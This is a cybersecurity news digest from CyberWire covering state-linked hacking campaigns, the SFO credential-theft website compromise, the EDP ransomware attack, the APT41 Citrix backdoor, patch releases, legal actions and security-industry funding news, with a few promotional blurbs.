By the CyberWire staff
Electric Panda targets US government contractors.
Politico reports that the US Defense Counterintelligence and Security Agency (DCSA) has warned government contractors that, since February 1st, thirty-eight cleared contractor facilities have been targeted by the Chinese-government-aligned threat actor "Electric Panda." Politico quotes a bulletin distributed by DCSA as saying the agency "detected nearly 600 'inbound and outbound connections' from 'highly likely Electric Panda cyber threat actors' targeting 38 cleared contractor facilities, including those specializing in health care technology." In addition to healthcare, the threat actor has been targeting contractors focused on "cybersecurity, aerospace, naval, health care, power generation, IT systems, telecommunications, risk analysis, and space systems." Politico cites a contractor source as saying these types of warnings from DCSA are common, but it's rare that they single out a specific threat actor.
Apple and Google are developing a COVID-19 contact-tracing system.
Apple and Google announced in a joint statement last week that they're partnering to build a COVID-19 contact-tracing system into the iOS and Android operating systems. The system will use Bluetooth functionality that will notify mobile device users if they’ve been in proximity to someone who’s been infected with the coronavirus. The companies plan to release APIs next month that will "enable interoperability between Android and iOS devices using apps from public health authorities," and then, "in the coming months, Apple and Google will work to enable a broader Bluetooth-based contact tracing platform by building this functionality into the underlying platforms. This is a more robust solution than an API and would allow more individuals to participate, if they choose to opt in, as well as enable interaction with a broader ecosystem of apps and government health authorities." The system depends upon self-reporting on the part of infected individuals, which means that, for the system to be effective, it would have to attract widespread opt-in as well as inspire a willingness on users’ parts to keep their status up-to-date.
The Verge summarizes the privacy safeguards the system will use, and notes the advantages and drawbacks of using Bluetooth Low Energy (BLE) technology. BLE can estimate distance based on signal strength, but it may not be precise enough to reliably give an idea of how risky an interaction was. The Verge surmises that Apple and Google will be working to hone this technology over the next few weeks.
Earn a Master's in Cybersecurity Part-Time & Online at Georgetown
Looking to advance your cybersecurity career? Then the Georgetown University Master's in Cybersecurity Risk Management is for you. Ideal for working professionals, our program offers flexible options to take classes online, on campus, or through a combination of both—so you don’t have to interrupt your career to earn your degree. You'll leave the program with the expertise you need to effectively manage risks and navigate today’s increasingly complex cyber threats. Learn more.
Examining China's COVID-19 disinformation campaigns.
The Wall Street Journal has an overview of the shape, scope, and probable objectives of the Chinese government’s disinformation campaign concerning the coronavirus pandemic. The efforts’ goals seem to be at least threefold. First, deflect any blame for mishandling the epidemic away from the Chinese government. Second, fix any blame there might be for the emergence of the virus somewhere else (and that somewhere else has usually been the United States). Third, portray China as a good international citizen, a reliable and technologically savvy provider of humanitarian aid. Much of this effort depends on state-run media gaining access to social media audiences through advertising, with subsequent amplification in other social media posts.
Read more in our CyberWire Pro Disinformation Briefing.
SFO websites compromised.
San Francisco International Airport (SFO) disclosed last week that two of its websites, SFOConnect and SFOConstruction, suffered cyberattacks last month in which attackers inserted code designed to steal users' login credentials. Users who may have been affected "include those accessing these websites from outside the airport network through Internet Explorer on a Windows-based personal device or a device not maintained by SFO."
According to ESET, "The intent was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix....The targeted information was NOT the visitor's credentials to the compromised websites, but rather the visitor's own Windows credentials." ZDNet explains that "NTLM hashes can be cracked to obtain a cleartext version of a user's Windows password."
ESET also noted that the tactics, techniques, and procedures displayed in the attack are consistent with those exhibited by Energetic Bear (also known as "Dragonfly"), a threat actor associated with Russia's GRU.
The Art of Invisibility: Important New Privacy Concerns for Your Quickly Evolving Remote Workforce
Czech Republic warns of disruptive attacks against healthcare institutions.
The Czech Republic's cybersecurity agency NUKIB warned Thursday that it expects to see an "extensive campaign" of disruptive cyberattacks against the country's healthcare facilities. The campaign is expected to begin within days, and a preparatory spearphishing campaign has been underway for several weeks.
A Czech official told Reuters that the actors behind the campaign are unknown, but they're believed to be a "serious and advanced adversary." While the malware samples highlighted by NUKIB use coronavirus-themed lures, another Czech official told Reuters that the spearphishing campaign "is not spray-and-pray COVID malware stuff."
Meanwhile, the Washington Post reports that hospitals and other healthcare institutions around the world are still subject to ransomware attacks. While a select few ransomware gangs pledged to avoid hitting hospitals for the duration of the pandemic, others are exploiting the heightened urgency of healthcare systems.
Portuguese energy giant hit with ransomware.
Energias de Portugal (EDP), a major European energy provider and the world's fourth-largest producer of wind power, sustained a ransomware attack on Monday that affected its corporate network, BleepingComputer reports. An EDP spokesperson told BleepingComputer that "[t]he power supply service and critical infrastructure, however, have never been compromised and we continue to ensure this operation as normal."
BleepingComputer says the attack involved the RagnarLocker ransomware, and the attackers are apparently demanding a 1,580 bitcoin ransom ($10.9 million or €9.9 million), though the EDP spokesperson said "we have no knowledge of this alleged ransom demand - we have only seen this information disclosed in the media, which we cannot verify." RagnarLocker is a fairly new strain of ransomware and was first observed in December 2019.
The attackers also claim to have exfiltrated more than ten terabytes of EDP's data, which they're threatening to leak if the ransom isn't paid. The crooks have published some of this data as proof, including a KeePass password manager database file which BleepingComputer says "leads to a database export including EDP employees' login names, passwords, accounts, URLs, and notes."
APT41 created FreeBSD malware for Citrix appliances.
Palo Alto Networks's Unit 42 published an analysis of a backdoor used by APT41, a Chinese-government-aligned threat actor whose recent activities were outlined by FireEye late last month. Between January and March 2020, FireEye observed the threat actor targeting Citrix, Cisco, and Zoho network devices used by organizations across a broad range of industries.
Unit 42 examined a backdoor the threat actor deployed on Citrix devices running the open-source Unix-like operating system FreeBSD. The backdoor, which Unit 42 calls "Speculoos," was delivered via CVE-2019-19781, a path-traversal vulnerability found in Citrix's Application Delivery Controllers and Gateways that was disclosed in December 2019. The researchers are certain that Speculoos was tailored to execute on Citrix devices and they believe the malware was created exclusively for this campaign, noting the timing of the Citrix vulnerability's disclosure, along with the rarity of malware designed specifically for FreeBSD.
However, the researchers believe the campaign itself was relatively opportunistic, with the attackers seeing the newly disclosed Citrix vulnerability as a low-hanging fruit that could allow them to "gain footholds in a large number of organizations with minimal effort to expand their attack infrastructure."
Read more in our CyberWire Pro Research Briefing.
Want to peek inside the mind of the CyberWire's new CSO, Rick Howard?
If you’re looking for views of someone in the know, check out The CyberWire's new weekly podcast featuring our very own Rick Howard in CSO Perspectives, the newest addition to CyberWire Pro+. CSO Perspectives is currently available for you to listen for free in the Daily Podcast feed for a limited time before transitioning to the CyberWire Pro+ feed. Listen and subscribe today!
Nemty to shut down public RaaS offering.
ZDNet reports that the Nemty ransomware gang has announced it's shuttering its public ransomware-as-a-service offering and going private—that is, restricting its customer base to a few skilled operators who will conduct more targeted and profitable attacks. The gang also shut down the site it uses to publish files stolen from uncooperative victims.
The group said past victims who haven't paid ransoms have a week to pay up if they want to acquire decryptors before Nemty's servers are shut down. BleepingComputer hopes this is simply a last-ditch attempt to compel victims to pay, and that the group will release its master keys upon ceasing operations like other ransomware gangs have done in the past.
Clearview AI's source code exposed.
TechCrunch reports that Clearview AI, a controversial company that offers a facial recognition search engine to its customers, inadvertently exposed the source code of its completed apps for Windows, Mac, Android, and iOS, as well as some pre-release versions of the apps. SpiderSilk, a cybersecurity firm headquartered in Dubai, discovered Clearview's data on a cloud server. The server did have a password, but a misconfiguration allowed anyone to create a new account and log in to the repository.
Clearview's founder told TechCrunch that the "flaw did not expose any personally identifiable information, search history or biometric identifiers," and he accused SpiderSilk of extortion. SpiderSilk's chief security officer Mossab Hussein said he disclosed the flaw to Clearview but turned down a bounty in order to publicly disclose the findings.
One of the cloud buckets did contain 70,000 videos taken from a camera in the lobby of an unknown residential building, which showed people passing through. Ton-That told TechCrunch that these videos were taken with the permission of the building's management and were used only for debugging purposes.
VMware released a patch for a critical vulnerability in the VMware Directory Service (vmdir) that could allow an attacker with access to port 389 "to extract highly sensitive information such as administrative account credentials which could be used to compromise vCenter Server or other services which are dependent upon vmdir for authentication." The flaw, tracked as CVE-2020-3952, received a CVSSv3 score of 10.0.
On Patch Tuesday, Microsoft fixed 113 security flaws, nineteen of which are rated "critical" and three of which are being exploited in the wild. KrebsOnSecurity says two of the exploited bugs are remote code execution vulnerabilities in the Adobe Font Manager library; both can be exploited by tricking a user into opening or previewing a malicious document.
Adobe released patches for ColdFusion, After Effects, and Digital Editions.
Crime and punishment.
The Dutch police arrested a local 19-year-old man who allegedly launched DDoS attacks against two Dutch government websites, knocking them offline for several hours, BleepingComputer reports. The police noted that the two affected websites, which serve as portals for citizens to receive government documents, are particularly crucial during the COVID-19 pandemic. The Central Netherlands Police also worked with "hosters or registrars, international police forces, Europol, Interpol, and the FBI" to shut down fifteen booters (DDoS-for-hire services).
The US Federal Trade Commission reports that it's received 20,334 reports COVID-19-related fraud since January 1st, totaling $15.6 million in losses. The median amount of money lost is $559.
Courts and torts.
Equifax will pay $18.2 million to Massachusetts and $19.5 million to Indiana over the credit reporting agency's 2017 data breach, CyberScoop reports. Equifax will also pay the city of Chicago $1.5 million, according to Law Street.
Facebook is suing the founder of a company called "LeadCloak" for allegedly selling software to assist scammers in ad-spoofing, Business Insider reports.
Policies, procurements, and agency equities.
The US Departments of State, the Treasury, and Homeland Security, and the FBI issued an advisory offering guidance on North Korea's cyber offensive, warning that Pyongyang's financially motivated operations "pose a significant threat to the integrity and stability of the international financial system." The DPRK's cyber activities include cyber-enabled bank heists, extortion campaigns, and cryptojacking. One of the advisory's more interesting points is that North Korea's hackers take up contracts and are "paid to hack websites and extort targets for third-party clients." Also noteworthy is the revelation that Pyongyang's cyber operators run protection rackets, demanding "payment from victims under the guise of long-term paid consulting arrangements in order to ensure that no such future malicious cyber activity takes place." The US Government is offering up to $5 million for information about North Korea's past or present cyber operations.
The US Supreme Court announced that it will begin holding oral arguments via teleconference starting in May, and it plans to provide a live audio feed of these sessions to news networks. Law360 notes that the Court postponed its March and April sessions due to the COVID-19 pandemic.
Read more in our CyberWire Pro Policy Briefing.
Fortunes of commerce.
Swedish telecommunications company Ericsson has won the contract to provide BT, the UK's largest telecom, with equipment for BT's 5G core, SDxCentral reports. Ericsson's equipment will replace Huawei's kit, which had already been installed in BT's network when the UK ruled that Huawei be banned from contributing to the core. According to the BBC, BT estimates that it will take until 2023 to finish removing Huawei's equipment.
Zoom continues to face privacy issues and has been banned from use by several large companies, including Siemens and Standard Chartered Bank, TechRadar reports. Zoom doesn't appear to be discouraged, however, and has added a number of respected security experts to its advisory team. ZDNet reports that, in addition to Alex Stamos, the company has brought on Luta Security's Katie Moussouris and Johns Hopkins professor Matthew Green. The CyberWire Pro Privacy Briefing has more on this story.
Crunchbase reports that startups have been hard-hit by the pandemic, with many of them forced to lay off workers. Big Tech, however, is hiring, and they're looking in particular for cybersecurity talent. The Wall Street Journal says that Facebook alone plans to hire 10,000 people during 2020.
Mergers and acquisitions.
Colorado-based SOAR platform provider Swimlane has acquired Washington, DC-headquartered incident response firm Syncurity.
CollabNet VersionOne, XebiaLabs, and Arxan Technologies are merging to form a new company, Digital.ai, backed by TPG Capital.
Investments and exits.
London-based biometric identity verification company Onfido has raised $100 million in a funding round led by TPG Growth, TechCrunch reports.
San Francisco-based bug bounty company Bugcrowd has raised $30 million in a Series D round led by Rally Ventures.
Santa Clara, California-based network traffic analysis company Awake Security has raised $36 million in a Series C round led by Evolution Equity Partners, with participation from Energize Ventures and Liberty Global Ventures, as well as existing investors Bain Capital Ventures and Greylock Partners.
New York City-based passwordless identity management company Beyond Identity publicly launched on Tuesday and raised $30 million in a Series A round led by Koch Disruptive Technologies, LLC and New Enterprise Associates. The company was founded by Jim Clark and Tom Jermoluk and aims to replace passwords with X.509-based certificates.
San Francisco-headquartered cloud security automation startup Bridgecrew has emerged from stealth with $18 million in Series A funding led by Battery Ventures, with participation from NFX, Sorenson Ventures, DNX Ventures, Tectonic Ventures, and Homeward Ventures.
San Francisco-based code-level error monitoring company Airbrake has raised $11 million in a funding round led by Elsewhere Partners.
Santa Barbara, California-based network traffic analysis provider MixMode has secured $4 million in a Series A round led by Entrada Ventures, with participation from Keshif Ventures and Blu Venture Investors, VentureBeat reports.
Lightspeed Venture Partners secured a total of $4.2 billion for three of its funds from undisclosed sources, Crunchbase News reports.
More business news, including executive moves, can be found in the CyberWire Pro Business Briefing.